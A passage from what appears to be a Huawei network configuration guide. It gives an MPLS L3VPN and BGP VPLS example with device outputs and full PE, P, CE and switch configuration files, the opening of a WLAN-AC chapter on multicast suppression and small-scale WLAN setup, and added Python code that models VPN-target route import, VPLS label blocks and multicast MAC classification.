connecting to a branch at 10.3.1.1 but cannot ping CE4 connecting to the headquarters of
enterprise B at 10.4.1.1.
[CE1] ping 10.3.1.1
PING 10.3.1.1: 56 data bytes, press CTRL_C to break
Reply from 10.3.1.1: bytes=56 Sequence=1 ttl=253 time=72 ms
Reply from 10.3.1.1: bytes=56 Sequence=2 ttl=253 time=34 ms
Reply from 10.3.1.1: bytes=56 Sequence=3 ttl=253 time=50 ms
Reply from 10.3.1.1: bytes=56 Sequence=4 ttl=253 time=50 ms
Reply from 10.3.1.1: bytes=56 Sequence=5 ttl=253 time=34 ms
--- 10.3.1.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 34/48/72 ms
[CE1] ping 10.4.1.1
PING 10.4.1.1: 56 data bytes, press CTRL_C to break
Request time out
Request time out
Request time out
Request time out
Request time out
--- 10.4.1.1 ping statistics ---
5 packet(s) transmitted
0 packet(s) received
100.00% packet loss
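The ping results above follow from VPN-target matching. The Python below is an added model, not Huawei code: it rebuilds PE1 and PE2 from the configuration files of this example (treating the CE-facing subnets as each VRF's local routes, in place of the EBGP-learned ones), installs VPNv4 routes only where export and import VPN targets intersect, and adds a check for VPN targets shared between differently named VRFs; build_leaky_example is a constructed misconfiguration, not the page's configuration.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass
class Vrf:
    name: str
    rd: str
    import_rts: Set[str]
    export_rts: Set[str]
    local_prefixes: List[str]
    table: Dict[str, str] = field(default_factory=dict)   # prefix -> "Direct" or BGP next hop


@dataclass
class Pe:
    name: str
    loopback: str            # MP-IBGP next hop (LoopBack1 address)
    vrfs: Dict[str, Vrf]


def vpnv4_advertisements(pe: Pe) -> List[Tuple[str, str, Set[str], str]]:
    """VPNv4 routes a PE originates: (RD:prefix, prefix, attached export RTs, next hop)."""
    return [(f"{v.rd}:{p}", p, set(v.export_rts), pe.loopback)
            for v in pe.vrfs.values() for p in v.local_prefixes]


def converge(pes: List[Pe]) -> None:
    """Populate every VRF table with its direct routes plus the VPNv4 routes whose
    export RTs intersect the VRF's import RTs (what 'policy vpn-target' enforces)."""
    for pe in pes:
        for v in pe.vrfs.values():
            v.table = {p: "Direct" for p in v.local_prefixes}
    for src in pes:
        for _rd_prefix, prefix, rts, next_hop in vpnv4_advertisements(src):
            for dst in pes:
                if dst is src:
                    continue
                for v in dst.vrfs.values():
                    if v.import_rts & rts:
                        v.table[prefix] = next_hop


def reachable(pe: Pe, vrf: str, ip: str) -> bool:
    """True when some route in the VRF covers `ip`."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(p) for p in pe.vrfs[vrf].table)


def cross_vrf_leaks(pes: List[Pe]) -> List[Tuple[str, str]]:
    """Pairs (importing VRF, exporting VRF) with different names that share an RT;
    such a pair silently merges two customers' routing."""
    leaks = []
    for a in pes:
        for va in a.vrfs.values():
            for b in pes:
                for vb in b.vrfs.values():
                    if va.name != vb.name and va.import_rts & vb.export_rts:
                        leaks.append((f"{a.name}:{va.name}", f"{b.name}:{vb.name}"))
    return leaks


def build_example() -> List[Pe]:
    """PE1 and PE2 as given in the configuration files of this example."""
    pe1 = Pe("PE1", "1.1.1.9", {
        "vpna": Vrf("vpna", "100:1", {"111:1"}, {"111:1"}, ["10.1.1.0/24"]),
        "vpnb": Vrf("vpnb", "100:2", {"222:2"}, {"222:2"}, ["10.2.1.0/24"]),
    })
    pe2 = Pe("PE2", "3.3.3.9", {
        "vpna": Vrf("vpna", "200:1", {"111:1"}, {"111:1"}, ["10.3.1.0/24"]),
        "vpnb": Vrf("vpnb", "200:2", {"222:2"}, {"222:2"}, ["10.4.1.0/24"]),
    })
    pes = [pe1, pe2]
    converge(pes)
    return pes


def build_leaky_example() -> List[Pe]:
    """Constructed misconfiguration: PE1's vpnb also imports 111:1, which pulls
    enterprise A's routes into enterprise B's VRF."""
    pes = build_example()
    pes[0].vrfs["vpnb"].import_rts.add("111:1")
    converge(pes)
    return pes


if __name__ == "__main__":
    pe1 = build_example()[0]
    print("CE1 -> CE3 (10.3.1.1):", reachable(pe1, "vpna", "10.3.1.1"))
    print("CE1 -> CE4 (10.4.1.1):", reachable(pe1, "vpna", "10.4.1.1"))
    print("leaks after misconfiguration:", cross_vrf_leaks(build_leaky_example()))
```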

Run the display vsi name vsi2 verbose command on PE1. The command output shows that vsi2
has a PW to PE2 and that the PW is in Up state.
[PE1] display vsi name vsi2 verbose

***VSI Name : vsi2
Administrator VSI : no
Isolate Spoken : disable
VSI Index : 1
PW Signaling : bgp
Member Discovery Style : auto
PW MAC Learn Style : unqualify
Encapsulation Type : vlan
MTU : 1500
Diffserv Mode : uniform
Mpls Exp : --
DomainId : 255
Domain Name :
Ignore AcState : disable
P2P VSI : disable
Create Time : 0 days, 0 hours, 22 minutes, 6 seconds
VSI State : up

BGP RD : 101:2
SiteID/Range/Offset : 1/5/0
Import vpn target : 200:1
Export vpn target : 200:1
Remote Label Block : 35845/5/0
Local Label Block : 0/35845/5/0

Interface Name : GigabitEthernet2/0/0.2
State : up
Access Port : false
Last Up Time : 2012/12/24 21:19:48
Total Up Time : 0 days, 0 hours, 20 minutes, 42 seconds

**PW Information:

*Peer Ip Address : 3.3.3.9
PW State : up
Local VC Label : 35847
Remote VC Label : 35846
PW Type : label
Local VCCV : alert lsp-ping bfd
Remote VCCV : alert lsp-ping bfd
Tunnel ID : 0x5
Broadcast Tunnel ID : 0x5
Broad BackupTunnel ID : 0x0
Ckey : 0xc
Nkey : 0xb
Main PW Token : 0x5
Slave PW Token : 0x0
Tnl Type : LSP
OutInterface : Vlanif30
Backup OutInterface :
Stp Enable : 0
PW Last Up Time : 2012/12/24 21:38:43
PW Total Up Time : 0 days, 0 hours, 1 minutes, 47 seconds
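The Local and Remote VC labels in the display above follow from the two sites' label blocks. The following Python is an added example, not Huawei code: it parses the base/size/offset form shown above and derives the PW labels with the BGP VPLS rule (label = base + VE ID - offset), returning no labels when a site ID falls outside the peer's advertised range or two sites share an ID. The PE1_VSI2 and PE2_VSI2 values are taken from the display output and the "site ... range 5 default-offset 0" commands of this example.

```python
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class LabelBlock:
    """A BGP VPLS label block as carried in the VPLS NLRI: label base, VE block size
    ("range") and VE block offset ("default-offset")."""
    base: int
    size: int
    offset: int

    @classmethod
    def parse(cls, text: str) -> "LabelBlock":
        """Parse the base/size/offset form shown by display vsi ... verbose ('35845/5/0').
        A leading block index, as in 'Local Label Block : 0/35845/5/0', is skipped."""
        parts = [int(p) for p in text.strip().split("/")]
        if len(parts) == 4:
            parts = parts[1:]
        if len(parts) != 3:
            raise ValueError(f"not a label block: {text!r}")
        base, size, offset = parts
        # MPLS labels 0-15 are reserved and the label space is 20 bits wide.
        if size <= 0 or base < 16 or base + size - 1 > (1 << 20) - 1:
            raise ValueError(f"label block out of range: {text!r}")
        return cls(base, size, offset)

    def covers(self, ve_id: int) -> bool:
        """True when the block has a label slot for VE `ve_id`."""
        return self.offset <= ve_id < self.offset + self.size

    def label_for(self, ve_id: int) -> Optional[int]:
        """Demultiplexer label the block's owner expects from VE `ve_id`."""
        if not self.covers(ve_id):
            return None
        return self.base + (ve_id - self.offset)


@dataclass(frozen=True)
class VplsSite:
    ve_id: int          # "site <id>" in the VSI's BGP view
    block: LabelBlock   # the block this site advertises


def pw_labels(local: VplsSite, remote: VplsSite) -> Optional[Tuple[int, int]]:
    """(local VC label, remote VC label) for the PW between two sites, or None when
    the sites share a VE ID or one VE ID falls outside the other's block; in both
    cases no PW comes up."""
    if local.ve_id == remote.ve_id:
        return None
    local_vc = local.block.label_for(remote.ve_id)    # label the remote sends to us
    remote_vc = remote.block.label_for(local.ve_id)   # label we send to the remote
    if local_vc is None or remote_vc is None:
        return None
    return local_vc, remote_vc


# From the vsi2 display on PE1: PE1 is site 1, PE2 is site 2, both "range 5 default-offset 0".
PE1_VSI2 = VplsSite(1, LabelBlock.parse("0/35845/5/0"))   # Local Label Block
PE2_VSI2 = VplsSite(2, LabelBlock.parse("35845/5/0"))     # Remote Label Block

if __name__ == "__main__":
    print("PE1 <-> PE2 (local VC, remote VC):", pw_labels(PE1_VSI2, PE2_VSI2))
    # A constructed site 7 lies outside a range-5 block, so no PW labels exist for it.
    print("PE1 <-> site 7:", pw_labels(PE1_VSI2, VplsSite(7, LabelBlock.parse("40000/5/0"))))
```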

----End

Configuration Files
• Configuration file of PE1
#
sysname PE1
#
vlan batch 30
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity

vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 100:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#
mpls lsr-id 1.1.1.9
mpls
#
mpls l2vpn
#
vsi vsi1 auto
pwsignal bgp
route-distinguisher 101:1
vpn-target 100:1 import-extcommunity
vpn-target 100:1 export-extcommunity
site 1 range 5 default-offset 0
#
vsi vsi2 auto
pwsignal bgp
route-distinguisher 101:2
vpn-target 200:1 import-extcommunity
vpn-target 200:1 export-extcommunity
site 1 range 5 default-offset 0
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type hybrid
#
interface GigabitEthernet1/0/0.1
dot1q termination vid 10
ip binding vpn-instance vpna
ip address 10.1.1.2 255.255.255.0
arp broadcast enable
#
interface GigabitEthernet1/0/0.2
dot1q termination vid 11
l2 binding vsi vsi1
#
interface GigabitEthernet2/0/0
port link-type hybrid
#
interface GigabitEthernet2/0/0.1
qinq termination pe-vid 100 ce-vid 20
ip binding vpn-instance vpnb
ip address 10.2.1.2 255.255.255.0
arp broadcast enable
#
interface GigabitEthernet2/0/0.2
qinq termination pe-vid 200 ce-vid 21
l2 binding vsi vsi2
#
interface GigabitEthernet3/0/0
port link-type hybrid
port hybrid pvid vlan 30
port hybrid untagged vlan 30
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100

peer 3.3.3.9 as-number 100
peer 3.3.3.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 3.3.3.9 enable
#
vpls-family
policy vpn-target
peer 3.3.3.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.9 enable
#
ipv4-family vpn-instance vpna
peer 10.1.1.1 as-number 65410
import-route direct
#
ipv4-family vpn-instance vpnb
peer 10.2.1.1 as-number 65420
import-route direct
#
ospf 1
area 0.0.0.0
network 172.1.1.0 0.0.0.255
network 1.1.1.9 0.0.0.0
#
return

• Configuration file of the P device
#
sysname P
#
vlan batch 30 60
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif60
ip address 172.2.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid pvid vlan 30
port hybrid untagged vlan 30
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid pvid vlan 60
port hybrid untagged vlan 60
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
ospf 1
area 0.0.0.0
network 172.1.1.0 0.0.0.255
network 172.2.1.0 0.0.0.255
network 2.2.2.9 0.0.0.0

#
return
• Configuration file of PE2
#
sysname PE2
#
vlan batch 60
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 200:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 200:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#
mpls lsr-id 3.3.3.9
mpls
#
mpls l2vpn
#
vsi vsi1 auto
pwsignal bgp
route-distinguisher 201:1
vpn-target 100:1 import-extcommunity
vpn-target 100:1 export-extcommunity
site 2 range 5 default-offset 0
#
vsi vsi2 auto
pwsignal bgp
route-distinguisher 201:2
vpn-target 200:1 import-extcommunity
vpn-target 200:1 export-extcommunity
site 2 range 5 default-offset 0
#
mpls ldp
#
interface Vlanif60
ip address 172.2.1.2 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type hybrid
#
interface GigabitEthernet1/0/0.1
dot1q termination vid 10
ip binding vpn-instance vpna
ip address 10.3.1.2 255.255.255.0
arp broadcast enable
#
interface GigabitEthernet1/0/0.2
dot1q termination vid 11
l2 binding vsi vsi1
#
interface GigabitEthernet2/0/0
port link-type hybrid
#
interface GigabitEthernet2/0/0.1
qinq termination pe-vid 100 ce-vid 20
ip binding vpn-instance vpnb
ip address 10.4.1.2 255.255.255.0
arp broadcast enable
#
interface GigabitEthernet2/0/0.2
qinq termination pe-vid 200 ce-vid 21
l2 binding vsi vsi2
#
interface GigabitEthernet3/0/0
port link-type hybrid
port hybrid pvid vlan 60
port hybrid untagged vlan 60
#
interface LoopBack1
ip address 3.3.3.9 255.255.255.255
#
bgp 100
peer 1.1.1.9 as-number 100
peer 1.1.1.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 1.1.1.9 enable
#
vpls-family
policy vpn-target
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
ipv4-family vpn-instance vpna
peer 10.3.1.1 as-number 65430
import-route direct
#
ipv4-family vpn-instance vpnb
peer 10.4.1.1 as-number 65440
import-route direct
#
ospf 1
area 0.0.0.0
network 172.2.1.0 0.0.0.255
network 3.3.3.9 0.0.0.0
#
return
• Configuration file of CE1 connecting to the headquarters of enterprise A
#
sysname CE1
#
vlan batch 10 to 11
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid tagged vlan 10 to 11
#
bgp 65410
peer 10.1.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.1.1.2 enable
#
return
• Configuration file of CE2 connecting to the headquarters of enterprise B
#
sysname CE2
#
vlan batch 20 to 21

#
interface Vlanif20
ip address 10.2.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid tagged vlan 20 to 21
#
bgp 65420
peer 10.2.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.2.1.2 enable
#
return
• Configuration file of CE3 connecting to a branch of enterprise A
#
sysname CE3
#
vlan batch 10 to 11
#
interface Vlanif10
ip address 10.3.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid tagged vlan 10 to 11
#
bgp 65430
peer 10.3.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.3.1.2 enable
#
return
• Configuration file of CE4 connecting to a branch of enterprise B
#
sysname CE4
#
vlan batch 20 to 21
#
interface Vlanif20
ip address 10.4.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid tagged vlan 20 to 21
#
bgp 65440
peer 10.4.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.4.1.2 enable
#
return
• Configuration file of Switch1
#
sysname Switch1
#
vlan batch 100 200
#

interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid untagged vlan 100 200
port vlan-stacking vlan 20 stack-vlan 100
port vlan-stacking vlan 21 stack-vlan 200
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid tagged vlan 100 200
#
return

• Configuration file of Switch2
#
sysname Switch2
#
vlan batch 100 200
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid untagged vlan 100 200
port vlan-stacking vlan 20 stack-vlan 100
port vlan-stacking vlan 21 stack-vlan 200
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid tagged vlan 100 200
#
return

15 Typical WLAN-AC Configuration (Applicable to Versions V200R005 to V200R008)

About This Chapter

15.1 Common Misconfigurations
15.2 Example for Configuring WLAN Services on a Small-Scale Network
15.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks
15.4 Example for Configuring Unified Access for Wired and Wireless Users
15.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal Authentication)
15.6 Example for Configuring MAC Address Authentication on the Wireless Side
15.7 Example for Configuring Portal Authentication on the Wireless Side
15.8 Configuring Radio Calibration
15.9 Configuring WLAN Roaming
15.10 Example for Configuring the WLAN Service Using WDS Technology
15.11 Example for Configuring the WLAN Service Using Mesh Technology

15.1 Common Misconfigurations

15.1.1 Multicast Packet Suppression Is Not Configured, and a Large Number of Low-Rate Multicast Packets Affect the Wireless Network

Symptom
No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets, they
are usually sent at low rates. If a large number of such multicast packets are sent from the
network side, the air interfaces may be congested. You are advised to configure multicast
packet suppression to reduce the impact of a large number of low-rate multicast packets on the
wireless network. Exercise caution when configuring the rate limit; otherwise, the multicast
services may be affected.
• In direct forwarding mode, you are advised to configure multicast packet suppression on
switch interfaces connected to APs.
• In tunnel forwarding mode, you are advised to configure multicast packet suppression on
WLAN-ESS interfaces of the AC.

Procedure
• Configure multicast packet suppression in direct forwarding mode.
a. Create the traffic classifier test and define a matching rule.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] traffic classifier test
[SwitchA-classifier-test] if-match destination-mac 0100-5e00-0000 mac-address-mask ffff-ff00-0000 //Match the destination MAC address of multicast packets.
[SwitchA-classifier-test] quit

b. Create the traffic behavior test, enable traffic statistics collection, and set the traffic
rate limit.
[SwitchA] traffic behavior test
[SwitchA-behavior-test] statistic enable
[SwitchA-behavior-test] car cir 100 //Set the rate limit to 100 kbit/s. If multicast services are available, you are advised to set the rate limit according to the service traffic.
[SwitchA-behavior-test] quit

c. Create the traffic policy test and bind the traffic classifier and traffic behavior to the
traffic policy.
[SwitchA] traffic policy test
[SwitchA-trafficpolicy-test] classifier test behavior test
[SwitchA-trafficpolicy-test] quit

d. Apply the traffic policy to the inbound and outbound directions of the interface.
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] traffic-policy test inbound
[SwitchA-GigabitEthernet0/0/1] traffic-policy test outbound
[SwitchA-GigabitEthernet0/0/1] quit

• Configure multicast packet suppression in tunnel forwarding mode.
a. Create the traffic profile test and set the maximum traffic volume of multicast
packets in the profile.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] wlan
[AC-wlan-view] traffic-profile name test
[AC-wlan-traffic-prof-test] traffic-optimize multicast-suppression packets 100 //Set the maximum traffic volume of multicast packets to 100 pps. If multicast services are available, you are advised to set the rate limit according to the service traffic.
[AC-wlan-traffic-prof-test] quit
b. Bind the traffic profile to the VAP profile.
[AC-wlan-view] vap-profile name test
[AC-wlan-vap-prof-test] traffic-profile test
[AC-wlan-vap-prof-test] quit

----End
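The classifier in step a of the direct forwarding procedure compares only the first three bytes of the destination MAC. The Python below is an added example, not Huawei code: it reproduces that mask test, maps IPv4 and IPv6 group addresses to their multicast MAC addresses, and runs constructed sample frames through the test, which shows that the rule catches IPv4 multicast (01-00-5e) but not IPv6 multicast (33-33) or broadcast.

```python
import ipaddress
from typing import Dict, List


def mac_to_int(mac: str) -> int:
    """Accept Huawei 'xxxx-xxxx-xxxx' as well as 'xx:xx:xx:xx:xx:xx' notation."""
    digits = mac.replace("-", "").replace(":", "")
    if len(digits) != 12:
        raise ValueError(f"bad MAC address: {mac!r}")
    return int(digits, 16)


def int_to_mac(value: int) -> str:
    """Render as Huawei 'xxxx-xxxx-xxxx' notation."""
    h = f"{value:012x}"
    return f"{h[0:4]}-{h[4:8]}-{h[8:12]}"


def classifier_matches(dst_mac: str, match: str = "0100-5e00-0000",
                       mask: str = "ffff-ff00-0000") -> bool:
    """The test behind 'if-match destination-mac <match> mac-address-mask <mask>':
    only the bits set in the mask are compared."""
    m = mac_to_int(mask)
    return (mac_to_int(dst_mac) & m) == (mac_to_int(match) & m)


def ipv4_multicast_mac(group: str) -> str:
    """RFC 1112 mapping: 01-00-5e followed by the low 23 bits of the group address,
    so 32 groups share one MAC (for example 224.1.1.1 and 225.1.1.1)."""
    g = ipaddress.IPv4Address(group)
    if not g.is_multicast:
        raise ValueError(f"{group} is not an IPv4 multicast group")
    return int_to_mac(0x01005E000000 | (int(g) & 0x7FFFFF))


def ipv6_multicast_mac(group: str) -> str:
    """RFC 2464 mapping: 33-33 followed by the low 32 bits of the group address."""
    g = ipaddress.IPv6Address(group)
    if not g.is_multicast:
        raise ValueError(f"{group} is not an IPv6 multicast group")
    return int_to_mac(0x333300000000 | (int(g) & 0xFFFFFFFF))


def rate_limited(frames: List[Dict[str, str]]) -> List[str]:
    """Names of the frames the classifier hands to the CAR action of behavior 'test'."""
    return [f["name"] for f in frames if classifier_matches(f["dst"])]


# Constructed sample frames (not captured traffic): destination MACs derived from
# well-known group addresses plus one broadcast and one unicast frame.
SAMPLE_FRAMES: List[Dict[str, str]] = [
    {"name": "mDNS 224.0.0.251", "dst": ipv4_multicast_mac("224.0.0.251")},
    {"name": "SSDP 239.255.255.250", "dst": ipv4_multicast_mac("239.255.255.250")},
    {"name": "IPv6 all-nodes ff02::1", "dst": ipv6_multicast_mac("ff02::1")},
    {"name": "broadcast", "dst": "ffff-ffff-ffff"},
    {"name": "unicast to STA", "dst": "0011-2233-4455"},
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(f"{f['name']:24s} {f['dst']}  limited={classifier_matches(f['dst'])}")
```

IPv6 multicast and broadcast pass this classifier untouched, so a deployment with IPv6 clients needs its own if-match destination-mac rule for the 33-33 prefix if those frames are to be suppressed as well.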

15.2 Example for Configuring WLAN Services on a Small-Scale Network

Small-Scale WLAN Overview
In this document, a Wireless Local Area Network (WLAN) uses 2.4 GHz or 5 GHz radio as the
transmission medium. Compared with wired networks, which are expensive, inflexible, fixed,
and lack mobility, WLANs are widely used because of their low cost, flexibility,
scalability, and mobility.
A small-scale WLAN can be a small campus network independently deployed for a small- or
medium-sized enterprise, or a branch network. A small-scale WLAN requires only a few
network devices to serve a small range of users.

Configuration Notes
• In this example, the security policy is WPA2-PSK-CCMP. To ensure network security,
choose an appropriate security policy according to your network configurations.
• In the service data forwarding mode, the management VLAN and service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
• If direct forwarding is used, configure port isolation on the interfaces that directly connect
to APs. If port isolation is not configured, a large number of broadcast packets will be
transmitted in the VLANs, and WLAN users on different APs will be able to communicate
directly at Layer 2.
• Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
forwarded normally only when the network between the AC and APs is added to
the management VLAN and the network between the AC and the upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated in a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be forwarded normally only when the
network between the AC and APs is added to the management VLAN and the
network between the APs and the upper-layer network is added to the service VLAN.
• How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
• No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce the impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide - WLAN AC > WLAN QoS
Configuration.
• The following table lists applicable products and versions.

Table 15-1 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN
V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
An enterprise has a small-scale branch network. The enterprise needs to deploy WLAN
services for mobile office so that its employees can access the enterprise internal network
anywhere and anytime.
As shown in Figure 15-1, the AC connects to APs through a PoE switch, and the PoE switch
provides power for APs. The WLAN service is configured on the AC, and delivered to APs.

Figure 15-1 Networking of a small-scale WLAN
[Figure: topology Internet, AC (GE1/0/2 toward the Internet, VLAN 101; GE1/0/1 toward SwitchA, VLAN 100), PoE SwitchA (GE0/0/2 toward the AC, VLAN 100; GE0/0/1 toward the AP, VLAN 100), AP, two STAs. Management VLAN: VLAN 100. Service VLAN: VLAN 101. AP region ID: 10]

Data Planning

Table 15-2 Data planning

Item | Data | Description
IP address of the AC's source interface | 192.168.10.1/24 | None
WMM profile | Name: wmm | None
Radio profile | Name: radio | None
Security profile | Name: security; security and authentication policy: WPA2+PSK; authentication key: huawei123; encryption mode: CCMP | None
Traffic profile | Name: traffic | None
Service set | Name: test; SSID: test; WLAN virtual interface: WLAN-ESS 1; data forwarding mode: tunnel forwarding | None
DHCP server | The AC functions as the DHCP server to assign IP addresses to APs and STAs. | None
AP gateway and IP address pool range | VLANIF 100: 192.168.10.1/24; pool 192.168.10.2 to 192.168.10.254/24 | None
STA gateway and IP address pool range | VLANIF 101: 192.168.11.1/24; pool 192.168.11.2 to 192.168.11.254/24 | None

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure the AP, AC, Switch, and upstream device to implement Layer 2
interconnection.
2. Configure the AC as a DHCP server to assign IP addresses to STAs and the AP from an
IP address pool of an interface.
3. Configure AC system parameters, including the country code, AC ID, carrier ID, and
source interface used by the AC to communicate with the AP.
4. Set the AP authentication mode and add the AP to an AP region.
5. Configure a VAP and deliver VAP parameters to the AP so that STAs can access the
WLAN.
a. Configure a WMM profile and a radio profile on the AP, retain the default settings of
both profiles, and bind the WMM profile to the radio profile so that STAs can
communicate with the AP.
b. Configure a WLAN-ESS interface so that radio packets can be sent to the WLAN
service module after reaching the AC.
c. Configure a security profile and a traffic profile on the AP, retain the default settings
of both profiles, configure a service set, and bind the WLAN-ESS interface, security
profile, and traffic profile to the service set to apply security policies and QoS
policies to STAs.
d. Configure a VAP and deliver VAP parameters to the AP so that STAs can access the
Internet through the WLAN.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.

NOTE
Configure AC uplink interfaces to transparently transmit packets of service VLANs as required and
communicate with the upstream device.

# Add AC uplink interface GE1/0/2 to service VLAN 101.
[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and the AP.
# Configure the AC as the DHCP server to allocate an IP address to the AP from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
